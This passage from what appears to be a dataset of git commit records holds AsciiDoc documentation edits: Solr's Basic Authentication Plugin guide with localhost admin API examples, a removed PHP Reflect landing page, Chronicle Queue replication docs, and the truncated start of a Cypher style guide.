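Base64.Encoder b64 = Base64.getEncoder();\n    System.out.println(b64.encodeToString(outer) + \" \" + b64.encodeToString(salt));\n  }\n}\n----\n\n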
[[BasicAuthenticationPlugin-EditingAuthenticationPluginConfiguration]]\n== Editing Authentication Plugin Configuration\n\nAn Authentication API allows modifying user IDs and passwords. The API provides an endpoint with specific commands to set user details or delete a user.\n\n[[BasicAuthenticationPlugin-APIEntryPoint]]\n=== API Entry Point\n\n`admin\/authentication`\n\nThis endpoint is not collection-specific, so users are created for the entire Solr cluster. If users need to be restricted to a specific collection, that can be done with the authorization rules.\n\n[[BasicAuthenticationPlugin-AddaUserorEditaPassword]]\n=== Add a User or Edit a Password\n\nThe `set-user` command allows you to add users and change their passwords. For example, the following defines two users and their passwords:\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-user\": {\"tom\" : \"TomIsCool\" ,\n \"harry\":\"HarrysSecret\"}}'\n----\n\n[[BasicAuthenticationPlugin-DeleteaUser]]\n=== Delete a User\n\nThe `delete-user` command allows you to remove a user. The user password does not need to be sent to remove a user. In the following example, we've asked that user IDs 'tom' and 'harry' be removed from the system.\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"delete-user\": [\"tom\",\"harry\"]}'\n----\n\n[[BasicAuthenticationPlugin-Setaproperty]]\n=== Set a Property\n\nSet arbitrary properties for the authentication plugin. The only supported property is `'blockUnknown'`.\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-property\": {\"blockUnknown\":false}}'\n----\n\n[[BasicAuthenticationPlugin-UsingBasicAuthwithSolrJ]]\n=== Using BasicAuth with SolrJ\n\nIn SolrJ, the basic authentication credentials need to be set for each request, as in this example:\n\n[source,java]\n----\nSolrRequest req; \/\/ create a new request object\nreq.setBasicAuthCredentials(userName, password);\nsolrClient.request(req);\n----\n\nQuery example:\n\n[source,java]\n----\nQueryRequest req = new QueryRequest(new SolrQuery(\"*:*\"));\nreq.setBasicAuthCredentials(userName, password);\nQueryResponse rsp = req.process(solrClient);\n----\n\n[[BasicAuthenticationPlugin-UsingCommandLinescriptswithBasicAuth]]\n=== Using Command Line scripts with BasicAuth\n\nAdd the following line to the `solr.in.sh` or `solr.in.cmd` file. This example tells the `bin\/solr` command line to use \"basic\" as the type of authentication, and to pass credentials with the username \"solr\" and password \"SolrRocks\":\n\n[source,bash]\n----\nSOLR_AUTH_TYPE=\"basic\"\nSOLR_AUTHENTICATION_OPTS=\"-Dbasicauth=solr:SolrRocks\"\n----\n","old_contents":"= Basic Authentication Plugin\n:page-shortname: basic-authentication-plugin\n:page-permalink: basic-authentication-plugin.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. 
The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nSolr can support Basic authentication for users with the use of the BasicAuthPlugin.\n\nAn authorization plugin is also available to configure Solr with permissions to perform various activities in the system. The authorization plugin is described in the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\n[[BasicAuthenticationPlugin-EnableBasicAuthentication]]\n== Enable Basic Authentication\n\nTo use Basic authentication, you must first create a `security.json` file. This file and where to put it is described in detail in the section <<authentication-and-authorization-plugins.adoc#AuthenticationandAuthorizationPlugins-EnablePluginswithsecurity.json,Enable Plugins with security.json>>.\n\nFor Basic authentication, the `security.json` file must have an `authentication` part which defines the class being used for authentication. Usernames and passwords (as a sha256(password+salt) hash) could be added when the file is created, or can be added later with the Basic authentication API, described below.\n\nThe `authorization` part is not related to Basic authentication, but is a separate authorization plugin designed to support fine-grained user access control. For more information, see the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\nAn example `security.json` showing both sections is shown below to show how these plugins can work together:\n\n[source,json]\n----\n{\n\"authentication\":{\n \"blockUnknown\": true,\n \"class\":\"solr.BasicAuthPlugin\",\n \"credentials\":{\"solr\":\"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=\"}\n},\n\"authorization\":{\n \"class\":\"solr.RuleBasedAuthorizationPlugin\",\n \"permissions\":[{\"name\":\"security-edit\",\n \"role\":\"admin\"}],\n \"user-role\":{\"solr\":\"admin\"}\n}}\n----\n\nThere are several things defined in this file:\n\n* Basic authentication and rule-based authorization plugins are enabled.\n* A user called 'solr', with a password `'SolrRocks'` has been defined.\n* The parameter `\"blockUnknown\": true` means that unauthenticated requests are not allowed to pass through.\n* The 'admin' role has been defined, and it has permission to edit security settings.\n* The 'solr' user has been defined to the 'admin' role.\n\nSave your settings to a file called `security.json` locally. If you are using Solr in standalone mode, you should put this file in `$SOLR_HOME`.\n\nIf `blockUnknown` does not appear in the `security.json` file, it will default to `false`. This has the effect of not requiring authentication at all. In some cases, you may want this; for example, if you want to have `security.json` in place but aren't ready to enable authentication. 
However, you will want to ensure that this parameter is set to `true` in order for authentication to be truly enabled in your system.\n\nIf you are using SolrCloud, you must upload `security.json` to ZooKeeper. You can use this example command, ensuring that the ZooKeeper port is correct:\n\n[source,bash]\n----\nbin\/solr zk cp file:path_to_local_security.json zk:\/security.json -z localhost:9983\n----\n\n[[BasicAuthenticationPlugin-Caveats]]\n=== Caveats\n\nThere are a few things to keep in mind when using the Basic authentication plugin.\n\n* Credentials are sent in plain text by default. It's recommended to use SSL for communication when Basic authentication is enabled, as described in the section <<enabling-ssl.adoc#enabling-ssl,Enabling SSL>>.\n* A user who has access to write permissions to `security.json` will be able to modify all the permissions and how users have been assigned permissions. Special care should be taken to only grant access to editing security to appropriate users.\n* Your network should, of course, be secure. Even with Basic authentication enabled, you should not unnecessarily expose Solr to the outside world.\n\n[[BasicAuthenticationPlugin-EditingAuthenticationPluginConfiguration]]\n== Editing Authentication Plugin Configuration\n\nAn Authentication API allows modifying user IDs and passwords. The API provides an endpoint with specific commands to set user details or delete a user.\n\n[[BasicAuthenticationPlugin-APIEntryPoint]]\n=== API Entry Point\n\n`admin\/authentication`\n\nThis endpoint is not collection-specific, so users are created for the entire Solr cluster. If users need to be restricted to a specific collection, that can be done with the authorization rules.\n\n[[BasicAuthenticationPlugin-AddaUserorEditaPassword]]\n=== Add a User or Edit a Password\n\nThe `set-user` command allows you to add users and change their passwords. For example, the following defines two users and their passwords:\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-user\": {\"tom\" : \"TomIsCool\" ,\n \"harry\":\"HarrysSecret\"}}'\n----\n\n[[BasicAuthenticationPlugin-DeleteaUser]]\n=== Delete a User\n\nThe `delete-user` command allows you to remove a user. The user password does not need to be sent to remove a user. In the following example, we've asked that user IDs 'tom' and 'harry' be removed from the system.\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"delete-user\": [\"tom\",\"harry\"]}'\n----\n\n[[BasicAuthenticationPlugin-Setaproperty]]\n=== Set a Property\n\nSet arbitrary properties for authentication plugin. 
The only supported property is `'blockUnknown'`\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-property\": {\"blockUnknown\":false}}'\n----\n\n[[BasicAuthenticationPlugin-UsingBasicAuthwithSolrJ]]\n=== Using BasicAuth with SolrJ\n\nIn SolrJ, the basic authentication credentials need to be set for each request as in this example:\n\n[source,java]\n----\nSolrRequest req ;\/\/create a new request object\nreq.setBasicAuthCredentials(userName, password);\nsolrClient.request(req);\n----\n\nQuery example:\n\n[source,java]\n----\nQueryRequest req = new QueryRequest(new SolrQuery(\"*:*\"));\nreq.setBasicAuthCredentials(userName, password);\nQueryResponse rsp = req.process(solrClient);\n----\n\n[[BasicAuthenticationPlugin-UsingCommandLinescriptswithBasicAuth]]\n=== Using Command Line scripts with BasicAuth\n\nAdd the following line to the `solr.in.sh` or `solr.in.cmd` file. This example tells the `bin\/solr` command line to to use \"basic\" as the type of authentication, and to pass credentials with the user-name \"solr\" and password \"SolrRocks\":\n\n[source,bash]\n----\nSOLR_AUTH_TYPE=\"basic\"\nSOLR_AUTHENTICATION_OPTS=\"-Dbasicauth=solr:SolrRocks\"\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b92c0e77cbd2910949e4d5e77600df467eaf2370","subject":"removed landing page 2.0 replaced by new one (index.asciidoc) in 2.1","message":"removed landing page 2.0 replaced by new one (index.asciidoc) in 2.1\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/landing.asciidoc","new_file":"docs\/landing.asciidoc","new_contents":"","old_contents":"= Reflect\n:description: Reverse-engineer classes, interfaces, traits, functions, constants, namespaces and more.\n:jumbotron-fullwidth:\n:css-signature: landing\n:icons!:\n:iconsfont: font-awesome\n:iconsfontdir: .\/fonts\/font-awesome\ninclude::revision.asciidoc[]\ninclude::attributes.asciidoc[]\n\n\n== What Is PHP Reflect\n\nWith PHP5 http:\/\/www.php.net\/manual\/en\/book.reflection.php[Reflection] API\nthe code to analyze needs to be loaded and interpreted by the php interpreter,\nand in certain cases, this triggers fatal errors.\n\nWith PHP [label label-primary]#Reflect# you don't have to trust in source code, because it will be parsed\nwith tokenizer extension.\n\n== Features\n\n[cols=\"1,11\"]\n.icon:flag[size=\"2x\"]\n--\n[medium]*Modern*\n\n[label label-primary]#Reflect# takes advantage of new features in PHP 5.3.0 or greater.\n--\n[cols=\"1,11\"]\n.icon:building-o[size=\"2x\"]\n--\n[medium]*Robust*\n\n[label label-primary]#Reflect# is strictly tested. Checks code coverage and see by yourself.\n--\n[cols=\"1,11\"]\n.icon:puzzle-piece[size=\"2x\"]\n--\n[medium]*Reflection API*\n\n[label label-primary]#Reflect# comes with a complete reflection API\nlink:features-compared.html[almost equivalent] to PHP5 reflection.\n--\n[cols=\"1,11\"]\n.icon:suitcase[size=\"2x\"]\n--\n[medium]*Solid Foundation*\n\nWhenever possible wheel reinvention was avoided. [label label-primary]#Reflect# uses code from well-known projects\nincluding http:\/\/www.symfony.com\/[Symfony] Finder, and EventDispatcher.\n--\n[cols=\"1,11\"]\n.icon:expand[size=\"2x\"]\n--\n[medium]*Extensible*\n\nSupported token parser is not enough for you ? Create your own. 
It is really simple!\n--\n\n== License\n\n[role=\"partintro\",cols=\"3,9\"]\n.icon:shield[size=\"7x\"] [clearfix]#Reflect is open-source software.#\n--\n[medium]*BSD License*\n\nThe full legal text of the BSD 3-clause license is given below.\n----\n Copyright (c) 2011-2014, Laurent Laville <pear@laurent-laville.org>\n\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and\/or other materials provided with the distribution.\n * Neither the name of the authors nor the names of its contributors\n may be used to endorse or promote products derived from this software\n without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS\n BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n----\n--\n\n== What is next\n\nWARNING: First visit, you are highly recommended to follow chapters in order.\n\n[horizontal]\nSetup:: Configuring your project and get ready for your first parsing.\nQuick Start:: This quick start is a five minute tutorial where you can discover how to identify a data source and parse its contents.\nHandle Results:: Learn how to explore and exploit parsing results.\nConcrete Examples:: Discover how Reflect may be use in real condition.\n\nlink:setup.html[\"Go to next chapter: Setup\",role=\"primary\",icon=\"glyphicon-step-forward\",options=\"block\"]\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ff5ad0d35f4802b2940905ae6cef3560b47b5e45","subject":"Re-worked and edited","message":"Re-worked and edited\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/replication.adoc","new_file":"docs\/replication.adoc","new_contents":"= Replication (Enterprise Edition Feature)\nNeil Clifford\n:toc: macro\n:toclevels: 1\n:css-signature: demo\n:toc-placement: macro\n:icons: font\n\ntoc::[]\n\nChronicle Queue replicates Chronicle Queue messages over TCP\/IP, from the `PRIMARY` to the `SECONDARY` to provide real-time back-up of your Chronicle queues.\n\nChronicle Queue automatically performs replication if the `chronicle-queue-enterprise.jar` is available in your class path, and you have set up a cluster in the `cluster.yaml` configuration file.\n\nNOTE: For more information on obtaining the `chronicle-queue-enterprise.jar` please contact mailto:sales@chronicle.software[sales@chronicle.software].\n\nChronicle Queue replication works by replicating all messages from the `PRIMARY` queue to the `SECONDARY` 
queue.\n\nimage::Chronicle-Queue-Replication_diagram_02.jpg[Replication]\n\nIMPORTANT: Chronicle requires exclusive write access to the `SECONDARY`. You should treat the `SECONDARY` as read-only, and not attempt to manually write messages.\n\n== Queue header\nThe Chronicle Queue header is structured as follows:\n\n[source, java]\n----\n\n--- !!meta-data #binary\nheader: !SCQStore {\n wireType: !WireType BINARY_LIGHT,\n writePosition: 524744,\n roll: !SCQSRoll {\n length: !short 1000,\n format: yyyyMMdd-HHmmss,\n epoch: 0\n },\n indexing: !SCQSIndexing {\n indexCount: !int 32768,\n indexSpacing: 4,\n index2Index: 385,\n lastIndex: 4\n },\n lastAcknowledgedIndexReplicated: -1,\n recovery: !TimedStoreRecovery {\n timeStamp: 0\n },\n deltaCheckpointInterval: 0\n}\n----\n`lastAcknowledgedIndexReplicated` is set to `-1` when\n\n- replication is not being used, or\n\n- no replication acknowledgment has yet been received from the other host.\n\n`lastAcknowledgedIndexReplicated` will be automatically set to the index position of the latest acknowledged message.\n\n\n== Tiered Indexing\nChronicle Queue uses tiered multi-level indexing to provide a fast and efficient method for searching for messages in a large queue.\n\n=== Primary index\n----\n# position: 385, header: -1 # <1>\n--- !!meta-data #binary\nindex2index: [ # <2>\n # length: 32768, used: 1\n 262568, # <3>\n 0, 0, 0, 0, 0,\n]\n----\n\n<1> `position` specifies the starting address of the data that follows, within the queue (*.cq4) file.\n\n<2> `index2Index` defines a pointer to the next lower level of index.\n\n<3> specifies the pointer to the next level of index.\n\nNOTE: In this way, indexes can be tiered (primary, secondary, tertiary, etc.) as required to enhance indexing speed and efficiency.\n\n=== Final level index\n\n----\n# position: 262568, header: -1 # <1>\n--- !!meta-data #binary\nindex: [ # <2>\n # length: 32768, used: 1\n 524744, # <3>\n 0, 0, 0, 0, 0, 0, 0, 0,\n]\n----\n<1> `position` specifies the point in the queue.\n\n<2> `index` defines a pointer to the data.\n\n<3> specifies the point in the queue where the data begins.\n\n=== Data location\n\n----\n# position: 524744, header: 0 # <1>\n--- !!data #binary # <2>\n\"\": some more text\n...\n# 785952 bytes remaining\n\n----\n<1> `position` specifies the point in the queue where the data begins.\n\n<2> `data` indicates that the information that follows is data (`--- !!data #binary #`), rather than meta data (`--- !!meta-data #binary`).\n\n\n== Configuration File\n\nThe hosts in a cluster are defined in a YAML configuration file. The configuration file below has just two hosts, but there is no fixed limit to the number of hosts you can include; ultimately, it is limited by your hardware resources.\n\nEach host is running an instance of Chronicle. When using Chronicle Queue Enterprise Edition, these engines are likely to each contain a Chronicle queue. In the example below there are two hosts, one running on `localhost:8080`, and the other on `localhost:8081`. 
The hosts are on the same machine; in a real-life deployment, these hosts would usually be on different machines.\n\nNOTE: The examples given below perform queue replication using established interfaces that are based on the open source Chronicle Engine API.\n\n[source, yaml]\n----\n\ncluster: {\n context: !EngineClusterContext {\n }\n host1: {\n hostId: 1,\n tcpBufferSize: 65536,\n connectUri: localhost:8080,\n timeoutMs: 5000,\n },\n host2: {\n hostId: 2,\n tcpBufferSize: 65536,\n connectUri: localhost:8081,\n timeoutMs: 5000,\n }\n}\n----\n\n== Host ID\n\nWhen adding a host, you must provide a unique ID for each host; we refer to this ID as the `hostId`. The `hostId` must be an integer, from `1` to `MAX_INTEGER`.\n\n[source, yaml]\n----\n host: {\n hostId: <unique id>,\n }\n----\n\nIt is important that this `hostId` is unique, as it is used by Chronicle Engine clustering. For Queue replication, by default, the host with a `hostId` of `1` is assumed to be the PRIMARY, and the other `hostId`s are assumed to be the SECONDARYs.\n\n== Creating an instance of the `ChronicleQueueView`\n\nThe following code is an example of how to create an instance of a host.\n\n[source, java]\n----\nfinal AssetTree tree = new VanillaAssetTree((byte) hostId)\n .forTesting()\n .withConfig(resourcesDir() + \"\/config\", OS.TARGET + \"\/\" + hostId);\n\nfinal Asset queue = tree.root().acquireAsset(\"the\/uri\");\n\nqueue.addLeafRule(QueueView.class, LAST + \"chronicle queue\", (context, asset) -> {\n try {\n return new ChronicleQueueView(context.wireType(writeType).cluster(clusterName)\n .elementType(context.elementType()).messageType(context.messageType()), asset);\n } catch (IOException e) {\n throw Jvm.rethrow(e);\n }\n});\n\n\/\/ change the host\/port to either localhost:8080 or localhost:8081 depending on which host you are running\nServerEndpoint serverEndpoint = new ServerEndpoint(\"localhost:8080\", tree);\n----\n\nThe code above:\n\n- sets up Chronicle on port `localhost:8080`.\n- uses the configuration file shown. This configuration file should be stored at `config\/etc\/clusters.yaml`.\n- configures an asset on the Chronicle Engine asset tree at `\/the\/uri` with a `leafRule`. This `leafRule` is set up to provide a `ChronicleQueueView` when asked for a `ChronicleQueue`. The `ChronicleQueueView` is an implementation of the `ChronicleQueue` interface.\n\n
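As a usage sketch only (the `acquireQueue()` call is an assumption about the Chronicle Engine API and may differ by version; `publishAndIndex()` and `get()` come from the `QueueView` interface shown below), publishing a message and reading it back might look like this:\n\n[source, java]\n----\n\/\/ Assumed acquisition method; adjust to the Chronicle Engine version in use.\nQueueView<String, String> queueView = tree.acquireQueue(\"the\/uri\", String.class, String.class);\n\n\/\/ publishAndIndex() returns the index of the excerpt in the queue,\n\/\/ which can then be used to read the excerpt back.\nlong index = queueView.publishAndIndex(\"greetings\", \"hello world\");\nQueueView.Excerpt<String, String> excerpt = queueView.get(index);\nassert \"hello world\".equals(excerpt.message());\n----\n\n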
Assuming that both `host1` and `host2` instances of Chronicle Engine were run with the same Java code above, messages added to the Chronicle queue on `host1` would be replicated to `host2`.\n\nThe interface of the `ChronicleQueueView` is as follows:\n\n[source, java]\n----\npublic interface QueueView<T, M> extends TopicPublisher<T, M>, KeyedView {\n\n \/**\n * returns a {@link Excerpt} at a given index\n *\n * @param index the location of the excerpt\n *\/\n @Nullable\n Excerpt<T, M> get(long index);\n\n \/**\n * the next message from the current tailer which has this {@code topic}\n *\n * @param topic next excerpt that has this topic\n * @return the excerpt\n *\/\n Excerpt<T, M> get(T topic);\n\n \/**\n * Publish to a provided topic.\n *\n * @param topic to publish to\n * @param message to publish.\n * @return the index of the excerpt in the Chronicle queue\n *\/\n long publishAndIndex(@NotNull T topic, @NotNull M message);\n\n interface Excerpt<T, M> {\n T topic();\n\n M message();\n\n long index();\n\n void clear();\n }\n\n interface Tailer<T, M> {\n \/**\n * @return the next message from the current tailer\n *\/\n @Nullable\n Excerpt<T, M> read();\n }\n}\n----\n\n\n== Definitions\n\n|=======\n|`Excerpt`| In Chronicle we refer to messages as excerpts.\n|`PRIMARY` | The master of the messages; messages are replicated from the PRIMARY to the SECONDARY.\n|`SECONDARY` | The receiver of the messages; holds a real-time, up-to-date copy of the PRIMARY's data.\n|=======\n\n'''\n\n<<..\/README.adoc#,Back to Chronicle Queue>>\n","old_contents":"= Replication (Enterprise Edition Feature)\nNeil Clifford\n:toc: macro\n:toclevels: 1\n:css-signature: demo\n:toc-placement: macro\n:icons: font\n\ntoc::[]\n\nChronicle Queue replicates Chronicle Queue messages over TCP\/IP, from the `PRIMARY` to the `SECONDARY` to provide real-time back-up of your Chronicle queues.\n\nChronicle Queue automatically performs replication if the `chronicle-queue-enterprise.jar` is available in your class path, and you have set up a cluster in the `cluster.yaml` configuration file.\n\nNOTE: For more information on obtaining the `chronicle-queue-enterprise.jar` please contact mailto:sales@chronicle.software[sales@chronicle.software].\n\nChronicle Queue replication works by replicating all messages from the `PRIMARY` queue to the `SECONDARY` queue.\n\nimage::Chronicle-Queue-Replication_diagram_02.jpg[Replication]\n\nIMPORTANT: Chronicle requires exclusive write access to the `SECONDARY`. 
You should treat the `SECONDARY` as read-only, and not attempt to manually write messages.\n\n== Queue header\nThe Chronical Queue header is structured as follows:\n\n[source, java]\n----\n\n--- !!meta-data #binary\nheader: !SCQStore {\n wireType: !WireType BINARY_LIGHT,\n writePosition: 524744,\n roll: !SCQSRoll {\n length: !short 1000,\n format: yyyyMMdd-HHmmss,\n epoch: 0\n },\n indexing: !SCQSIndexing {\n indexCount: !int 32768,\n indexSpacing: 4,\n index2Index: 385,\n lastIndex: 4\n },\n lastAcknowledgedIndexReplicated: -1,\n recovery: !TimedStoreRecovery {\n timeStamp: 0\n },\n deltaCheckpointInterval: 0\n}\n----\n`lastAcknowledgedIndexReplicated` is set to `-1` when\n\n- replication is not being used, or\n\n- no replication acknowledgment has yet been received from the other host.\n\n`lastAcknowledgedIndexReplicated` will be automatically set to the index position of the latest acknowledged message.\n\n\n== Tiered Indexing\nChronicle Queue uses tiered multi-level indexing to provide a fast and efficient method for searching for messages in a large queue.\n\n=== Primary index\n----\n# position: 385, header: -1 # <1>\n--- !!meta-data #binary\nindex2index: [ # <2>\n # length: 32768, used: 1\n 262568, # <3>\n 0, 0, 0, 0, 0,\n]\n----\n\n<1> `position` specifies the starting address of the data that follows, within the the queue (*.cq4) file.\n\n<2> `index2Index` defines a pointer to the next lower level of index.\n\n<3> specifies the point to the next level index.\n\nNOTE: In this way, indexes can be tiered (primary, secondary, tertiary, etc.) as required to enhance indexing speed and efficiency.\n\n=== Final level index\n\n----\n# position: 262568, header: -1 # <1>\n--- !!meta-data #binary\nindex: [ # <2>\n # length: 32768, used: 1\n 524744, # <3>\n 0, 0, 0, 0, 0, 0, 0, 0,\n]\n----\n<1> `position` specifies the point in the queue.\n\n<2> `index` defines a pointer to the data.\n\n<3> specifies the point in the queue where the data begins.\n\n=== Data location\n\n----\n# position: 524744, header: 0 # <1>\n--- !!data #binary # <2>\n\"\": some more text\n...\n# 785952 bytes remaining\n\n----\n<1> `position` specifies the point in the queue where the data begins.\n\n<2> `data` defines the following information is data (`--- !!data #binary #`) rather than than meta data (`--- !!meta-data #binary`).\n\n\n== Configuration File\n\nThe host in a cluster are defined in a YAML configuration file. This configuration file below, has just two hosts, but there is no fixed limit to the number of hosts you could include, ultimately it is limited by your hardware resources.\n\nEach host is a running an instance of Chronicle. When using Chronicle Queue Enterprise Edition, these engines are likely to each contain a Chronicle queue. In this example below there are two hosts, one running on `localhost:8080`, and the other on `localhost:8081`. The hosts are on the same machine; in a real life example, these hosts would usually be on different machines.\n\nNOTE: The examples given below perform queue replication using established interfaces that are based on the open source Chronicle Engine API.\n\n[source, yaml]\n----\n\ncluster: {\n context: !EngineClusterContext {\n }\n host1: {\n hostId: 1,\n tcpBufferSize: 65536,\n connectUri: localhost:8080,\n timeoutMs: 5000,\n },\n host2: {\n hostId: 2,\n tcpBufferSize: 65536,\n connectUri: localhost:8081,\n timeoutMs: 5000,\n }\n}\n----\n\n== Host ID\n\nWhen adding a host, you must provide a unique ID for each host; we refer to this ID as the `hostId`. 
The `hostId` must be a integer, from `1` to `MAX_INTEGER`.\n\n[source, yaml]\n----\n host: {\n hostId: <unique id>,\n }\n----\n\nIt is important that this `hostId` is unique as it is used by Chronicle Engine clustering. For Queue replication, by default, the host with `hostID` of `1` is assumed to be the PRIMARY, and the other hostids are assumed to be the SECONDARYs.\n\n== Creating an instance of the `ChronicleQueueView`\n\nThe following code is an example of how to create an instance of a host.\n\n[source, java]\n----\nfinal AssetTree tree = new VanillaAssetTree((byte) hostId)\n .forTesting()\n .withConfig(resourcesDir() + \"\/config\", OS.TARGET + \"\/\" + hostId);\n\nfinal Asset queue = tree.root().acquireAsset(\"the\/uri\");\n\nqueue.addLeafRule(QueueView.class, LAST + \"chronicle queue\", (context, asset) -> {\n try {\n return new ChronicleQueueView(context.wireType(writeType).cluster(clusterName)\n .elementType(context.elementType()).messageType(context.messageType()), asset);\n } catch (IOException e) {\n throw Jvm.rethrow(e);\n }\n});\n\n\/\/ change the host\/port to either localhost:8080 or localhost:8081 depending on which host you are running\nServerEndpoint serverEndpoint = new ServerEndpoint(\"localhost:8080\", tree);\n----\n\nThe code above:\n\n- sets up Chronicle on port `localhost:8080`.\n- uses the configuration file shown. This configuration file should be stored at `config\/etc\/clusters.yaml`.\n- configures an asset on the Chronicle Engine asset tree at `\/the\/uri` with a `leafRule`. This `leafRule` is setup to provide a `ChronicleQueueView` when asked for a `ChronicleQueue`. The `ChronicleQueueView` is an implementation of the `ChronicleQueue` interface.\n\nAssuming that both `host1` and `host2` instances of Chronicle Engine were run with the same java code above, then messages added to the chronicle queue on `host1` would be replicated to `host2`.\n\nThe interface of the `ChronicleQueueView`, is as follows:\n\n[source, java]\n----\npublic interface QueueView<T, M> extends TopicPublisher<T, M>, KeyedView {\n\n \/**\n * returns a {@link Excerpt} at a given index\n *\n * @param index the location of the except\n *\/\n @Nullable\n Excerpt<T, M> get(long index);\n\n \/**\n * the next message from the current tailer which has this {@code topic}\n *\n * @param topic next excerpt that has this topic\n * @return the except\n *\/\n Excerpt<T, M> get(T topic);\n\n \/**\n * Publish to a provided topic.\n *\n * @param topic to publish to\n * @param message to publish.\n * @return the index in the chronicle queue the excerpt\n *\/\n long publishAndIndex(@NotNull T topic, @NotNull M message);\n\n interface Excerpt<T, M> {\n T topic();\n\n M message();\n\n long index();\n\n void clear();\n }\n\n interface Tailer<T, M> {\n \/**\n * @return the next message from the current tailer\n *\/\n @Nullable\n Excerpt<T, M> read();\n }\n}\n----\n\n\n== Definitions\n\n|=======\n|`Excerpt`| In Chronicle we refer to messages as excerpts.\n|`PRIMARY` | The master of the messages; messages are replicated from the PRIMARY to the SECONDARY.\n|`SECONDARY` | The receiver of the messages; holds an real-time up-to-date copy of the PRIMARY's data.\n|=======\n\n'''\n\n<<..\/README.adoc#,Back to Chronicle Queue>>\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9fff53b7113d3bc9ac40f47eb96b6d3c938e7a3","subject":"Update rule descriptions to improve language","message":"Update rule descriptions to improve 
language\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/style-guide.adoc","new_file":"docs\/style-guide.adoc","new_contents":"= The Cypher Style Guide\n\nStyle guide for writing Cypher code.\n\nNOTE: Cypher is a language.\nLanguages have their own rules, and are not eager to adapt to circumstance.\nRemember not to be too eager to shiv a Cypher expression into the conventions of a different language.\n\n== Why Is Style Important?\n\nConsider this dadaist work of art from Nigel Small and Nicole White:\n\n.Insane query\n[source, cypher]\n----\nMATCH (null)-[:merge]->(true)\nwith null.delete as foreach, `true`.false as null\nreturn 2 + foreach, coalesce(null, 3.1415)\nlimit 10;\n----\n\nThen compare it to this classical piece by Mark Needham:\n\n.Sane query\n[source, cypher]\n----\nMATCH (member:Member {name: 'Mark Needham'})\n -[:HAS_MEMBERSHIP]->()-[:OF_GROUP]->(:Group)-[:HAS_TOPIC]->(topic)\nWITH member, topic, count(*) AS score\nMATCH (topic)<-[:HAS_TOPIC]-(otherGroup:Group)\nWHERE NOT (member)-[:HAS_MEMBERSHIP]->(:Membership)-[:OF_GROUP]->(otherGroup)\nRETURN otherGroup.name, collect(topic.name), sum(score) AS score\nORDER BY score DESC\n----\n\n== Rules\n\nWhenever two rules are in conflict, use the order to decide which one trumps.\n\n\/\/ Template:\n\/\/. rule\n\/\/+\n\/\/.Bad\n\/\/[source, cypher]\n\/\/----\n\/\/MATCH (person:Person {property: value})\n\/\/----\n\/\/.. No padding space for parameters.\n\/\/+\n\/\/.Good\n\/\/[source, cypher]\n\/\/----\n\/\/WITH { param } AS value\n\/\/----\n\n. Start a new clause on a new line.\n+\n.Bad\n[source, 